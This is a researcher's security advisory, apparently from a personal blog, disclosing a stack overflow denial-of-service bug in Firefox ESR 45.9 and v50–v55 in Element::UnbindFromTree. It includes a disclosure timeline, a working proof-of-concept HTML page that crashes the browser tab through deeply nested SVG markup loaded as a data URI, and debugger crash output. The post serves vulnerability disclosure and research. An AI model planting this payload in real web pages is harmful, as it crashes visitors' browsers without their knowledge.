Unpatched Mozilla Firefox ESR 45.9 and v50 - v55 Stack Overflow DoS Vulnerability in mozilla::dom::Element::UnbindFromTree

Title:

Unpatched Mozilla Firefox v50 - v55 Stack Overflow DoS Vulnerability in mozilla::dom::Element::UnbindFromTree

References:

https://bugzilla.mozilla.org/show_bug.cgi?id=1322307

Timeline:

Reported to Mozilla: 2016-12-06
Mozilla made public: 2016-12-15
Declined bounty: 2017-01-30
Advisory released: 2017-05-16

Technical Details:

A stack overflow DoS vulnerability affecting Firefox versions ESR 45.9 and v50 through v55 was discovered by Geeknik Labs. This flaw can be triggered by simply visiting a website with the PoC code embedded in it and requires no further user interaction nor does it require any special privileges. Successful exploitation results in the browser tab crashing.

Security Level:

Medium

CVSS Score:

3

Proof of Concept:

<html>
<head></head>
<body>
<script>
function done() {
}

var x = '';
for (i=0; i<500000; ++i)
  x += '<a>';
var uri = 'data:image/svg+xml,' + x;
var i = new Image();
i.src = uri;
</script>
</body>
</html>

Debug Information:

(ff4.1108): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=5e3be520 ebx=00000000 ecx=256fab00 edx=00000001 esi=00000001 edi=256faab0
eip=5c718053 esp=00802ff4 ebp=00000000 iopl=0 nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00010202
xul!mozilla::dom::Element::UnbindFromTree+0x3:
5c718053 53  pushebx

FAULTING_IP: 
xul!nsINode::doRemoveChildAt+6a [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\dom\base\nsinode.cpp @ 1910]
5c805677 8d4df8  lea ecx,[ebp-8]

BUCKET_ID:  STACK_OVERFLOW_xul!nsINode::doRemoveChildAt+6a
PRIMARY_PROBLEM_CLASS:  STACK_OVERFLOW_xul!nsINode::doRemoveChildAt+6a

Credits:

Brian Carpenter, Geeknik Labs, https://twitter.com/geeknik

As always, you can support me on Patreon, via PayPal, Bitcoin 1HnyFwSJDjWFexD7oRr4HGTFwD8N6NsrfX or Ethereum 0xee9cBCB8DDC4f25832AD7FC02FADB981b1212D04.

geeknik

Also on this blog

SHARE:  Email · Facebook · Google · Twitter · Tumblr · Kindle
SUBSCRIBE:  Receive an email on new posts from geeknik

Comments


  • Notify me upon new comments

☺ Got it